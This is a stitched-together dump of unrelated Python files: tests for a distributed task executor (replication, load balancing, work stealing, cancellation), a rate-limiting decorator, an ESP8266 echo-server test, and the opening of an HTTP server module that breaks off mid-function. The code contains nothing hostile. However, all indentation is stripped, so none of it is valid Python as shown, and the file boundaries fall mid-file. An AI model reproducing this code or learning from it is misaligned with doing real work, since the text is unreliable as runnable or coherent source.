futures = e.map(inc, range(10), workers=[('127.0.0.1', a['port'])])
e.rebalance(futures)
has_what = e.has_what()
assert len(has_what) == 2
assert list(valmap(len, has_what).values()) == [5, 5]
@gen_cluster(executor=True)
def test_receive_lost_key(e, s, a, b):
x = e.submit(inc, 1, workers=[a.address])
result = yield x._result()
yield a._close()
start = time()
while x.status == 'finished':
assert time() < start + 5
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[])
def test_add_worker_after_tasks(e, s):
futures = e.map(inc, range(10))
n = Nanny(s.ip, s.port, ncores=2, loop=s.loop)
n.start(0)
result = yield e._gather(futures)
yield n._close()
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_workers_register_indirect_data(e, s, a, b):
[x] = yield e._scatter([1], workers=a.address)
y = e.submit(inc, x, workers=b.ip)
yield y._result()
assert b.data[x.key] == 1
assert s.who_has[x.key] == {a.address, b.address}
assert s.has_what[b.address] == {x.key, y.key}
s.validate()
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(executor=True, ncores=[('127.0.0.1', 2), ('127.0.0.2', 2)],
timeout=20)
def test_work_stealing(e, s, a, b):
[x] = yield e._scatter([1])
futures = e.map(slowadd, range(50), [x] * 50)
yield _wait(futures)
assert len(a.data) > 10
assert len(b.data) > 10
@gen_cluster(executor=True)
def test_submit_on_cancelled_future(e, s, a, b):
x = e.submit(inc, 1)
yield x._result()
yield e._cancel(x)
with pytest.raises(CancelledError):
y = e.submit(inc, x)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_replicate(e, s, *workers):
[a, b] = yield e._scatter([1, 2])
yield s.replicate(keys=[a.key, b.key], n=5)
assert len(s.who_has[a.key]) == 5
assert len(s.who_has[b.key]) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_replicate_workers(e, s, *workers):
[a, b] = yield e._scatter([1, 2], workers=[workers[0].address])
yield s.replicate(keys=[a.key, b.key], n=5,
workers=[w.address for w in workers[:5]])
assert len(s.who_has[a.key]) == 5
assert len(s.who_has[b.key]) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
yield s.replicate(keys=[a.key, b.key], n=1)
assert len(s.who_has[a.key]) == 1
assert len(s.who_has[b.key]) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate()
yield s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.who_has[a.key]) == 10
assert len(s.who_has[b.key]) == 10
s.validate()
yield s.replicate(keys=[a.key, b.key], n=1,
workers=[w.address for w in workers[:5]])
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
class CountSerialization(object):
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_replicate_tree_branching(e, s, *workers):
obj = CountSerialization()
[future] = yield e._scatter([obj])
yield s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_executor_replicate(e, s, *workers):
x = e.submit(inc, 1)
y = e.submit(inc, 2)
yield e._replicate([x, y], n=5)
assert len(s.who_has[x.key]) == 5
assert len(s.who_has[y.key]) == 5
yield e._replicate([x, y], n=3)
assert len(s.who_has[x.key]) == 3
assert len(s.who_has[y.key]) == 3
yield e._replicate([x, y])
assert len(s.who_has[x.key]) == 10
assert len(s.who_has[y.key]) == 10
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1),
('127.0.0.2', 1),
('127.0.0.2', 1)], timeout=None)
def test_executor_replicate_host(e, s, a, b, c):
x = e.submit(inc, 1, workers='127.0.0.2')
yield _wait([x])
assert (s.who_has[x.key] == {b.address} or
s.who_has[x.key] == {c.address})
yield e._replicate([x], workers=['127.0.0.2'])
assert s.who_has[x.key] == {b.address, c.address}
yield e._replicate([x], workers=['127.0.0.1'])
assert s.who_has[x.key] == {a.address, b.address, c.address}
def test_executor_replicate_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
y = e.submit(inc, 2)
e.replicate([x, y], n=2)
who_has = e.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
e.replicate([x], n=0)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 4)] * 1)
def test_task_load_adapts_quickly(e, s, a):
future = e.submit(slowinc, 1, delay=0.2) # slow
yield _wait(future)
assert 0.15 < s.task_duration['slowinc'] < 0.4
futures = e.map(slowinc, range(10), delay=0) # very fast
yield _wait(futures)
assert 0 < s.task_duration['slowinc'] < 0.1
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_even_load_after_fast_functions(e, s, a, b):
x = e.submit(inc, 1, workers=a.address) # very fast
y = e.submit(inc, 2, workers=b.address) # very fast
yield _wait([x, y])
futures = e.map(inc, range(2, 11))
yield _wait(futures)
assert abs(len(a.data) - len(b.data)) <= 2
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_even_load_on_startup(e, s, a, b):
x, y = e.map(inc, [1, 2])
yield _wait([x, y])
assert len(a.data) == len(b.data) == 1
@gen_cluster(executor=True, ncores=[('127.0.0.1', 2)] * 2)
def test_contiguous_load(e, s, a, b):
w, x, y, z = e.map(inc, [1, 2, 3, 4])
yield _wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4)
def test_balanced_with_submit(e, s, *workers):
L = [e.submit(slowinc, i) for i in range(4)]
yield _wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4)
def test_balanced_with_submit_and_resident_data(e, s, *workers):
[x] = yield e._scatter([10], broadcast=True)
L = [e.submit(slowinc, x, pure=False) for i in range(4)]
yield _wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_balanced_with_submit_and_resident_data(e, s, a, b):
slow1 = e.submit(slowinc, 1, delay=0.2, workers=a.address) # learn slow
slow2 = e.submit(slowinc, 2, delay=0.2, workers=b.address)
yield _wait([slow1, slow2])
aa = e.map(inc, range(100), pure=False, workers=a.address) # learn fast
bb = e.map(inc, range(100), pure=False, workers=b.address)
yield _wait(aa + bb)
cc = e.map(slowinc, range(10), delay=0.1)
while not all(c.done() for c in cc):
assert all(len(p) < 3 for p in s.processing.values())
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 20)] * 2)
def test_scheduler_saturates_cores(e, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = e.map(slowinc, range(100), delay=delay)
futures = e.map(slowinc, futures, delay=delay / 10)
while not s.tasks or s.ready:
if s.tasks:
assert all(len(p) >= 20 for p in s.processing.values())
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 20)] * 2)
def test_scheduler_saturates_cores_stacks(e, s, a, b):
for delay in [0, 0.01, 0.1]:
x = e.map(slowinc, range(100), delay=delay, pure=False,
workers=a.address)
y = e.map(slowinc, range(100), delay=delay, pure=False,
workers=b.address)
while not s.tasks or any(s.stacks.values()):
if s.tasks:
for w, stack in s.stacks.items():
if stack:
assert len(s.processing[w]) >= s.ncores[w]
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 20)] * 2)
def test_scheduler_saturates_cores_random(e, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = e.map(randominc, range(100), scale=0.1)
while not s.tasks or s.ready:
if s.tasks:
assert all(len(p) >= 20 for p in s.processing.values())
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_dont_steal_expensive_data_fast_computation(e, s, a, b):
np = pytest.importorskip('numpy')
x = e.submit(np.arange, 1000000, workers=a.address)
yield _wait([x])
future = e.submit(np.sum, [1], workers=a.address) # learn that sum is fast
yield _wait([future])
cheap = [e.submit(np.sum, x, pure=False, workers=a.address,
allow_other_workers=True) for i in range(10)]
yield _wait(cheap)
assert len(b.data) == 0
assert len(a.data) == 12
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_steal_cheap_data_slow_computation(e, s, a, b):
x = e.submit(slowinc, 100, delay=0.1) # learn that slowinc is slow
yield _wait([x])
futures = e.map(slowinc, range(10), delay=0.01, workers=a.address,
allow_other_workers=True)
yield _wait(futures)
assert abs(len(a.data) - len(b.data)) < 3
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_steal_expensive_data_slow_computation(e, s, a, b):
np = pytest.importorskip('numpy')
x = e.submit(slowinc, 100, delay=0.1, workers=a.address)
yield _wait([x]) # learn that slowinc is slow
x = e.submit(np.arange, 1000000, workers=a.address) # put expensive data
yield _wait([x])
slow = [e.submit(slowinc, x, delay=0.1, pure=False) for i in range(4)]
yield _wait([slow])
assert b.data # not empty
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_worksteal_many_thieves(e, s, *workers):
x = e.submit(slowinc, -1, delay=0.1)
yield x._result()
xs = e.map(slowinc, [x] * 100, pure=False, delay=0.01)
yield _wait(xs)
for w, keys in s.has_what.items():
assert 2 < len(keys) < 50
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_dont_steal_unknown_functions(e, s, a, b):
futures = e.map(inc, [1, 2], workers=a.address, allow_other_workers=True)
yield _wait(futures)
assert len(a.data) == 2
assert len(b.data) == 0
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_eventually_steal_unknown_functions(e, s, a, b):
futures = e.map(slowinc, range(10), delay=0.1, workers=a.address,
allow_other_workers=True)
yield _wait(futures)
assert len(a.data) >= 3
assert len(b.data) >= 3
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4, timeout=None)
def test_cancel_stress(e, s, *workers):
da = pytest.importorskip('dask.array')
x = da.random.random((40, 40), chunks=(1, 1))
x = e.persist(x)
yield _wait([x])
y = (x.sum(axis=0) + x.sum(axis=1) + 1).std()
for i in range(5):
f = e.compute(y)
while len(s.waiting) > (len(y.dask) - len(x.dask)) / 2:
yield gen.sleep(0.01)
yield e._cancel(f)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4)
def test_cancel_clears_processing(e, s, *workers):
da = pytest.importorskip('dask.array')
x = e.submit(slowinc, 1, delay=0.2)
while not s.tasks:
yield gen.sleep(0.01)
yield e._cancel(x)
start = time()
while any(v for v in s.processing.values()):
assert time() < start + 0.2
yield gen.sleep(0.01)
s.validate()
def test_cancel_stress_sync(loop):
da = pytest.importorskip('dask.array')
x = da.random.random((40, 40), chunks=(1, 1))
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.persist(x)
y = (x.sum(axis=0) + x.sum(axis=1) + 1).std()
wait(x)
for i in range(5):
f = e.compute(y)
sleep(1)
e.cancel(f)
def test_default_get(loop):
with cluster() as (s, [a, b]):
pre_get = _globals.get('get')
pre_shuffle = _globals.get('shuffle')
with Executor(('127.0.0.1', s['port']), loop=loop, set_as_default=True) as e:
assert _globals['get'] == e.get
assert _globals['shuffle'] == 'tasks'
assert _globals['get'] is pre_get
assert _globals['shuffle'] == pre_shuffle
e = Executor(('127.0.0.1', s['port']), loop=loop, set_as_default=False)
assert _globals['get'] is pre_get
assert _globals['shuffle'] == pre_shuffle
e.shutdown()
e = Executor(('127.0.0.1', s['port']), loop=loop, set_as_default=True)
assert _globals['shuffle'] == 'tasks'
assert _globals['get'] == e.get
e.shutdown()
assert _globals['get'] is pre_get
assert _globals['shuffle'] == pre_shuffle
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
assert _globals['get'] == e.get
@gen_cluster(executor=True)
def test_get_stacks_processing(e, s, a, b):
stacks = yield e.scheduler.stacks()
assert stacks == valmap(list, s.stacks)
processing = yield e.scheduler.processing()
assert processing == valmap(list, s.processing)
futures = e.map(slowinc, range(10), delay=0.1, workers=[a.address],
allow_other_workers=True)
yield gen.sleep(0.2)
stacks = yield e.scheduler.stacks()
assert stacks == valmap(list, s.stacks)
processing = yield e.scheduler.processing()
assert processing == valmap(list, s.processing)
@gen_cluster(executor=True, Worker=Nanny)
def test_bad_tasks_fail(e, s, a, b):
f = e.submit(sys.exit, 1)
with pytest.raises(KilledWorker):
yield f._result()
def test_get_stacks_processing_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
stacks = e.stacks()
processing = e.processing()
assert len(stacks) == len(processing) == 2
assert not any(v for v in stacks.values())
assert not any(v for v in processing.values())
futures = e.map(slowinc, range(10), delay=0.1,
workers=[('127.0.0.1', a['port'])],
allow_other_workers=True)
sleep(0.2)
aa = '127.0.0.1:%d' % a['port']
bb = '127.0.0.1:%d' % b['port']
stacks = e.stacks()
processing = e.processing()
assert stacks[aa]
assert all(k.startswith('slowinc') for k in stacks[aa])
assert stacks[bb] == []
assert set(e.stacks(aa)) == {aa}
assert set(e.stacks([aa])) == {aa}
assert set(e.processing(aa)) == {aa}
assert set(e.processing([aa])) == {aa}
e.cancel(futures)
def dont_test_scheduler_falldown(loop):
with cluster(worker_kwargs={'heartbeat_interval': 10}) as (s, [a, b]):
s['proc'].terminate()
s['proc'].join(timeout=2)
try:
s2 = Scheduler(loop=loop)
loop.add_callback(s2.start, s['port'])
sleep(0.1)
with Executor(('127.0.0.1', s['port']), loop=loop) as ee:
assert len(ee.ncores()) == 2
finally:
s2.close()
def test_shutdown_idempotent(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
e.shutdown()
e.shutdown()
e.shutdown()
@gen_cluster(executor=True)
def test_get_returns_early(e, s, a, b):
start = time()
with ignoring(Exception):
result = yield e._get({'x': (throws, 1), 'y': (sleep, 1)}, ['x', 'y'])
assert time() < start + 0.5
assert not e.futures
start = time()
while 'y' in s.tasks:
yield gen.sleep(0.01)
assert time() < start + 3
x = e.submit(inc, 1)
yield x._result()
with ignoring(Exception):
result = yield e._get({'x': (throws, 1),
x.key: (inc, 1)}, ['x', x.key])
assert x.key in s.tasks
@gen_cluster(Worker=Nanny, executor=True)
def test_Executor_clears_references_after_restart(e, s, a, b):
x = e.submit(inc, 1)
assert x.key in e.refcount
yield e._restart()
assert x.key not in e.refcount
key = x.key
del x
import gc; gc.collect()
assert key not in e.refcount
@gen_cluster(Worker=Nanny, executor=True)
def test_forgotten_futures_dont_clean_up_new_futures(e, s, a, b):
x = e.submit(inc, 1)
yield e._restart()
y = e.submit(inc, 1)
del x
import gc; gc.collect()
yield gen.sleep(0.1)
yield y._result()
def test_get_stops_work_after_error(loop):
loop2 = IOLoop()
s = Scheduler(loop=loop2)
s.start(0)
w = Worker(s.ip, s.port, loop=loop2)
w.start(0)
t = Thread(target=loop2.start)
t.daemon = True
t.start()
with Executor(s.address, loop=loop) as e:
with pytest.raises(Exception):
e.get({'x': (throws, 1), 'y': (sleep, 1)}, ['x', 'y'])
start = time()
while len(s.tasks):
sleep(0.1)
assert time() < start + 5
loop2.add_callback(loop2.stop)
while loop2._running:
sleep(0.01)
loop2.close(all_fds=True)
t.join()
def test_as_completed_list(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
seq = e.map(inc, iter(range(5)))
seq2 = list(as_completed(seq))
assert set(e.gather(seq2)) == {1, 2, 3, 4, 5}
@pytest.mark.ipython
def test_start_ipython(loop):
from jupyter_client import BlockingKernelClient
from ipykernel.kernelapp import IPKernelApp
from IPython.core.interactiveshell import InteractiveShell
with cluster(1) as (s, [a]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
info_dict = e.start_ipython()
info = first(info_dict.values())
key = info.pop('key')
kc = BlockingKernelClient(**info)
kc.session.key = key
kc.start_channels()
msg_id = kc.execute("worker")
reply = kc.get_shell_msg(timeout=10)
kc.stop_channels()
@pytest.mark.ipython
def test_start_ipython_magic(loop):
ip = mock.Mock()
with cluster() as (s, [a, b]):
with mock.patch('IPython.get_ipython', lambda : ip), Executor(('127.0.0.1', s['port']), loop=loop) as e:
workers = list(e.ncores())[:2]
names = [ 'magic%i' % i for i in range(len(workers)) ]
e.start_ipython(workers, magic_names=names)
assert ip.register_magic_function.call_count == 4
expected = [
{'magic_kind': 'line', 'magic_name': 'magic0'},
{'magic_kind': 'cell', 'magic_name': 'magic0'},
{'magic_kind': 'line', 'magic_name': 'magic1'},
{'magic_kind': 'cell', 'magic_name': 'magic1'},
]
call_kwargs_list = [ kwargs for (args, kwargs) in ip.register_magic_function.call_args_list ]
assert call_kwargs_list == expected
@pytest.mark.ipython
def test_start_ipython_qtconsole(loop):
Popen = mock.Mock()
with cluster() as (s, [a, b]):
with mock.patch('distributed._ipython_utils.Popen', Popen), Executor(('127.0.0.1', s['port']), loop=loop) as e:
worker = first(e.ncores())
e.start_ipython(worker, qtconsole=True)
e.start_ipython(worker, qtconsole=True, qtconsole_args=['--debug'])
assert Popen.call_count == 2
(cmd,), kwargs = Popen.call_args_list[0]
assert cmd[:3] == [ 'jupyter', 'qtconsole', '--existing' ]
(cmd,), kwargs = Popen.call_args_list[1]
assert cmd[-1:] == [ '--debug' ]
@gen_cluster(ncores=[], executor=True, timeout=None)
def test_stress_creation_and_deletion(e, s):
da = pytest.importorskip('dask.array')
x = da.random.random(size=(2000, 2000), chunks=(100, 100))
y = (x + 1).T + (x * 2) - x.mean(axis=1)
z = e.persist(y)
@gen.coroutine
def create_and_destroy_worker(delay):
start = time()
while time() < start + 10:
n = Nanny(s.ip, s.port, ncores=2, loop=s.loop)
n.start(0)
yield gen.sleep(delay)
yield n._close()
print("Killed nanny")
yield [create_and_destroy_worker(0.1 * i) for i in range(10)]
|
decorators.py
|
import threading
from functools import wraps
from typing import Optional
from request_limiter.exceptions import LimitException
from request_limiter.strategy import LimitStrategy, LimitedIntervalStrategy
class RequestLimiterDecorator(object):
"""
A decorator class used to limit request rate to a function using a custom strategy or the default
LimitedIntervalStrategy.
"""
def __init__(self, strategy: Optional[LimitStrategy] = None):
"""
:param strategy: A request limit strategy
"""
self.strategy = strategy or LimitedIntervalStrategy()
def __call__(self, f):
"""
Returns a wrapped function that checks the strategy before invoking the function
:param f: The function to be wrapped
:return: Wrapped function
"""
# Run clean up daemon in background
clean_task = threading.Thread(target=self.strategy.clean, daemon=True)
clean_task.start()
@wraps(f)
def wrapper(*args, **kwargs):
"""
Checks and raises LimitException if the function reached the maximum allowed invocation
"""
with threading.RLock(): # Request in a tread safe way
key = kwargs.pop('limit_key', None)
if not self.strategy.allow(key=key): # Failed to allocate
raise LimitException('Rate limit exceeded.', self.strategy)
return f(*args, **kwargs)
return wrapper
def django_request_limiter(f):
"""
Returns a wrapped function for django request handler function.
It applies limit strategy based on request IP and returns 429.
:param f: django request handler function decorated with request_limiter
:return: wrapped function
"""
@wraps(f)
def wrapper(request, *args, **kwargs):
# Set the default limit per IP
ip = request.META.get('REMOTE_ADDR')
kwargs['limit_key'] = ip
try:
return f(request, *args, **kwargs)
except LimitException as e:
from django.http import HttpResponse
body = "Rate limit exceeded. Try again in {} seconds".format(e.strategy.get_remaining(ip))
return HttpResponse(body, status=429)
return wrapper
|
test_sw_WiFiServer.py
|
from mock_decorators import setup, teardown
from threading import Thread
import socket
import time
stop_client_thread = False
client_thread = None
@setup('Simple echo server')
def setup_echo_server(e):
global stop_client_thread
global client_thread
def echo_client_thread():
time.sleep(1) # let some time for mDNS to start
server_address = socket.gethostbyname('esp8266-wfs-test.local')
count = 0
while count < 5 and not stop_client_thread:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server_address, 5000))
sock.settimeout(1.0)
buf = 'a' * 1023 + '\n'
sock.sendall(bytes(buf.encode('utf-8')))
data = ''
retries = 0
while len(data) < 1024 and retries < 3:
data += sock.recv(1024).decode('utf-8')
retries += 1
print('Received {} bytes'.format(len(data)))
if len(data) != 1024:
raise RuntimeError('client failed to receive response')
count += 1
stop_client_thread = False
client_thread = Thread(target=echo_client_thread)
client_thread.start()
@teardown('Simple echo server')
def teardown_echo_server(e):
global stop_client_thread
stop_client_thread = True
client_thread.join()
|
httpd.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2019 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
import BaseHTTPServer
import cStringIO
import datetime
import httplib
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import SocketServer
import subprocess
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import addr_to_int
from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SERVER_HEADER
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import TRAILS_FILE
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import VERSION
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
BaseHTTPServer.HTTPServer.server_bind(self)
def finish_request(self, *args, **kwargs):
try:
BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class SSLThreadingServer(ThreadingServer):
def __init__(self, server_address, pem, HandlerClass):
import OpenSSL # python-openssl
ThreadingServer.__init__(self, server_address, HandlerClass)
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
ctx.use_privatekey_file(pem)
ctx.use_certificate_file(pem)
self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self, request):
try:
request.shutdown()
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {}
content = None
skip = False
if hasattr(self, "data"):
params.update(urlparse.parse_qs(self.data))
if query:
params.update(urlparse.parse_qs(query))
for key in params:
if params[key]:
params[key] = params[key][-1]
if path == '/':
path = "index.html"
path = path.strip('/')
extension = os.path.splitext(path)[-1].lower()
if hasattr(self, "_%s" % path):
content = getattr(self, "_%s" % path)(params)
else:
path = path.replace('/', os.path.sep)
path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
path = "%s.html" % path
if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
content = open(path, "rb").read()
content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content)
self.send_response(httplib.OK)
elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
mtime = time.gmtime(os.path.getmtime(path))
if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
if if_modified_since and extension not in (".htm", ".html"):
if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
self.send_response(httplib.NOT_MODIFIED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
skip = True
if not skip:
content = open(path, "rb").read()
last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
if extension not in (".htm", ".html"):
self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555
else:
self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
else:
self.send_response(httplib.NOT_FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
content = '<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
if content is not None:
for match in re.finditer(r"<\!(\w+)\!>", content):
name = match.group(1)
_ = getattr(self, "_%s" % name.lower(), None)
if _:
content = self._format(content, **{ name: _() })
if "gzip" in self.headers.getheader(HTTP_HEADER.ACCEPT_ENCODING, ""):
self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
_ = cStringIO.StringIO()
compress = gzip.GzipFile("", "w+b", 9, _)
compress._stream = _
compress.write(content)
compress.flush()
compress.close()
content = compress._stream.getvalue()
self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
self.end_headers()
if content:
self.wfile.write(content)
self.wfile.flush()
self.wfile.close()
def do_POST(self):
length = self.headers.getheader(HTTP_HEADER.CONTENT_LENGTH)
data = self.rfile.read(int(length))
data = urllib.unquote_plus(data)
self.data = data
self.do_GET()
def get_session(self):
retval = None
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
if SESSIONS[session].client_ip != self.client_address[0]:
pass
elif SESSIONS[session].expiration > time.time():
retval = SESSIONS[session]
else:
del SESSIONS[session]
return retval
def delete_session(self):
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
del SESSIONS[session]
def version_string(self):
return SERVER_HEADER
def end_headers(self):
if not hasattr(self, "_headers_ended"):
BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
self._headers_ended = True
def log_message(self, format, *args):
return
def finish(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _version(self):
return VERSION
def _format(self, content, **params):
if content:
for key, value in params.items():
content = content.replace("<!%s!>" % key, value)
return content
def _login(self, params):
valid = False
if params.get("username") and params.get("hash") and params.get("nonce"):
if params.get("nonce") not in DISPOSED_NONCES:
DISPOSED_NONCES.add(params.get("nonce"))
for entry in (config.USERS or []):
entry = re.sub(r"\s", "", entry)
username, stored_hash, uid, netfilter = entry.split(':')
if username == params.get("username"):
try:
if params.get("hash") == hashlib.sha256(stored_hash.strip() + params.get("nonce")).hexdigest():
valid = True
break
except:
if config.SHOW_DEBUG:
traceback.print_exc()
if valid:
session_id = os.urandom(SESSION_ID_LENGTH).encode("hex")
expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.SET_COOKIE, "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration))))
if netfilter in ("", "0.0.0.0/0"):
netfilters = None
else:
addresses = set()
netmasks = set()
for item in set(re.split(r"[;,]", netfilter)):
item = item.strip()
if '/' in item:
_ = item.split('/')[-1]
if _.isdigit() and int(_) >= 16:
lower = addr_to_int(item.split('/')[0])
mask = make_mask(int(_))
upper = lower | (0xffffffff ^ mask)
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
else:
netmasks.add(item)
elif '-' in item:
_ = item.split('-')
lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
addresses.add(item)
